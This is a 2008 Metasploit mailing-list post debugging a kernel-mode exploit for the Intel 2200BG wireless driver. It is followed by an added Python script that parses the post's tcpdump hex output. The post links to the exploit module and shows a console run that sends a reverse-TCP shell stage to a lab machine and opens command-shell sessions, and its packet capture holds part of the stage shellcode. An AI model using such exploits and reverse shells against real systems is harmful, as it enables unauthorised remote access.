
Metasploit mailing list archives
Mistake in kernel mode payloads
From: overet at securitydate.it (Giuseppe Gottardi)
Date: Tue, 11 Mar 2008 20:43:41 +0100
On Wed, Feb 27, 2008 at 1:34 AM, <mmiller at hick.org> wrote:
> On Wed, Feb 27, 2008 at 01:27:24AM +0100, Giuseppe Gottardi wrote:
> > Hi mans,
> > I have a little trouble with Windows kernel mode exploitation.
> >
> > When a user-land payload is executed in the context of the lsass.exe
> > process, it forces lsass.exe to exit and the system shuts
> > down after 60 seconds due to an lsass.exe system error.
>
> What is EXITFUNC set to when you run your exploit? In general, the stager
> assumes that the user-mode payload will take care of cleanup. Currently,
> this typically involves a call to ExitProcess, ExitThread, or generating
> an exception (depending on EXITFUNC). If your EXITFUNC is set to seh this
> will likely cause lsass to crash in the manner that you're seeing.
Sorry for the delay in getting back to you, I have been very busy these days.

I decided to publish the code we were talking about. It is a fully functional exploit for the Intel Centrino 2200BG that you can download from my web site and add to Metasploit if you want:

http://overet.securitydate.it/stuff/intel_2200BG_probe.rb

As you can see, EXITFUNC is not set to seh, but lsass.exe dies when I try to use staged payloads. For example...

msf exploit(intel_2200BG_probe) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
...
msf exploit(intel_2200BG_probe) > show options

Module options:

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   ADDR_DST   00:0e:35:95:7b:45  yes       The MAC address to send this to
   CHANNEL    1                  yes       The default channel number
   DELAY      1                  yes       The number of seconds to sleep between the packets
   DRIVER     madwifing          yes       The name of the wireless driver for lorcon
   INTERFACE  ath8               yes       The name of the wireless interface
   RUNTIME    1000               yes       The number of time to run the attack

Payload options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.33.212   yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 (5.1.2600), w22n51.sys 8.0.12.20000

msf exploit(intel_2200BG_probe) > rexploit
[*] Started reverse handler
[*] Sending probe exploit to 00:0e:35:95:7b:45...
[-] #################################################################################################################[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (192.168.33.212:4444 -> 192.168.33.159:1085)
#
[*] Completed sending probe.

(lsass.exe dies)

tcpdump output:

15:45:30.849331 IP overet.imgames > 192.168.33.212.krb524: S 1057652243:1057652243(0) win 65535 <mss 1460,nop,nop,sackOK>
    0x0000:  4500 0030 1abe 4000 8006 1b46 c0a8 219f  E..0..@....F..!.
    0x0010:  c0a8 21d4 0435 115c 3f0a 7e13 0000 0000  ..!..5.\?.~.....
    0x0020:  7002 ffff ebac 0000 0204 05b4 0101 0402  p...............
15:45:30.849386 IP 192.168.33.212.krb524 > overet.imgames: S 3241052817:3241052817(0) ack 1057652244 win 5840 <mss 1460,nop,nop,sackOK>
    0x0000:  4500 0030 0000 4000 4006 7604 c0a8 21d4  E..0..@.@.v...!.
    0x0010:  c0a8 219f 115c 0435 c12e 8a91 3f0a 7e14  ..!..\.5....?.~.
    0x0020:  7012 16d0 890b 0000 0204 05b4 0101 0402  p...............
15:45:30.849506 IP overet.imgames > 192.168.33.212.krb524: . ack 1 win 65535
    0x0000:  4500 0028 1abf 4000 8006 1b4d c0a8 219f  E..(..@....M..!.
    0x0010:  c0a8 21d4 0435 115c 3f0a 7e14 c12e 8a92  ..!..5.\?.~.....
    0x0020:  5010 ffff cc9f 0000 0000 0000 0000       P.............
15:45:30.850715 IP 192.168.33.212.krb524 > overet.imgames: P 1:475(474) ack 1 win 5840
    0x0000:  4500 0202 8379 4000 4006 f0b8 c0a8 21d4  E....y@.@.....!.
    0x0010:  c0a8 219f 115c 0435 c12e 8a92 3f0a 7e14  ..!..\.5....?.~.
    0x0020:  5018 16d0 e9ca 0000 6833 3200 0068 5753  P.......h32..hWS
    0x0030:  325f 57fc e84c 0000 0060 8b6c 2428 8b45  2_W..L...`.l$(.E
    0x0040:  3c8b 7c05 7801 ef8b 4f18 8b5f 2001 ebe3  <.|.x...O.._....
    0x0050:  3049                                     0I
15:45:30.988871 IP overet.imgames > 192.168.33.212.krb524: . ack 475 win 65061
    0x0000:  4500 0028 1ac0 4000 8006 1b4c c0a8 219f  E..(..@....L..!.
    0x0010:  c0a8 21d4 0435 115c 3f0a 7e14 c12e 8c6c  ..!..5.\?.~....l
    0x0020:  5010 fe25 cc9f 0000 0000 0000 0000       P..%..........

msf exploit(intel_2200BG_probe) > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.33.212:4444 -> 192.168.33.159:1234
  2   Command shell  192.168.33.212:4444 -> 192.168.33.159:1077

msf exploit(intel_2200BG_probe) > sessions -i 2
[*] Starting interaction with 2...

( Session doesn't appear :/ )

However, the exploit works with the "windows/exec" payload. Do you have any idea about this problem?

Thanks for your support and regards,
Giuseppe Gottardi
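Added worked example, not part of the thread: the capture in the post already shows the 474-byte stage leaving the handler and the target acknowledging all 474 bytes, so whatever goes wrong happens inside the target after the stage has arrived. The script below rebuilds the stage segment and the final ACK from the tcpdump -X lines quoted above (sample copied from them, with the archive's " at " mangling of '@' in the ASCII column restored) and checks the declared payload length, the captured prefix of the stage, and the ack-minus-seq arithmetic.

```python
import re
# Constructed sample, copied from the tcpdump -X output in the post ('@' restored where
# the archive printed " at "): the stage segment (474 bytes declared, 0x52 captured) and the ACK.
STAGE_PKT = r"""
    0x0000:  4500 0202 8379 4000 4006 f0b8 c0a8 21d4  E....y@.@.....!.
    0x0010:  c0a8 219f 115c 0435 c12e 8a92 3f0a 7e14  ..!..\.5....?.~.
    0x0020:  5018 16d0 e9ca 0000 6833 3200 0068 5753  P.......h32..hWS
    0x0030:  325f 57fc e84c 0000 0060 8b6c 2428 8b45  2_W..L...`.l$(.E
    0x0040:  3c8b 7c05 7801 ef8b 4f18 8b5f 2001 ebe3  <.|.x...O.._....
    0x0050:  3049                                     0I
"""
ACK_PKT = r"""
    0x0000:  4500 0028 1ac0 4000 8006 1b4c c0a8 219f  E..(..@....L..!.
    0x0010:  c0a8 21d4 0435 115c 3f0a 7e14 c12e 8c6c  ..!..5.\?.~....l
    0x0020:  5010 fe25 cc9f 0000 0000 0000 0000       P..%..........
"""
HEX_TOKEN = re.compile(r"[0-9a-f]{4}|[0-9a-f]{2}")

def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild the raw packet from 'tcpdump -X' lines, skipping the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        if not line.lstrip().startswith("0x"):
            continue                      # timestamp/summary lines carry no bytes
        row = bytearray()
        for tok in line.split(":", 1)[1].split():
            # the ASCII column begins at the first non-hex token, or after 16 bytes
            if len(row) >= 16 or not HEX_TOKEN.fullmatch(tok):
                break
            row += bytes.fromhex(tok)
        out += row
    return bytes(out)

def parse_tcp(pkt: bytes) -> dict:
    """IPv4/TCP header fields plus the payload actually present in the capture."""
    ip_hl = (pkt[0] & 0x0F) * 4
    total = int.from_bytes(pkt[2:4], "big")
    if pkt[9] != 6:
        raise ValueError("not a TCP segment")
    tcp_hl = (pkt[ip_hl + 12] >> 4) * 4
    return {
        "seq": int.from_bytes(pkt[ip_hl + 4:ip_hl + 8], "big"),
        "ack": int.from_bytes(pkt[ip_hl + 8:ip_hl + 12], "big"),
        "flags": pkt[ip_hl + 13],
        "declared_payload": total - ip_hl - tcp_hl,          # from IP total length
        "captured_payload": pkt[ip_hl + tcp_hl:total],        # cut short by snaplen
    }

def bytes_acked(data_pkt: bytes, ack_pkt: bytes) -> int:
    """How much of the data segment the peer acknowledged: ack - seq (mod 2^32)."""
    return (parse_tcp(ack_pkt)["ack"] - parse_tcp(data_pkt)["seq"]) % (1 << 32)
```

The captured prefix of the stage starts with the bytes that push "32" and "WS2_" onto the stack (the `h32..hWS2_` visible in the ASCII column), and bytes_acked() returns 474, matching both the "Sending stage (474 bytes)" line and the "ack 475" in the capture.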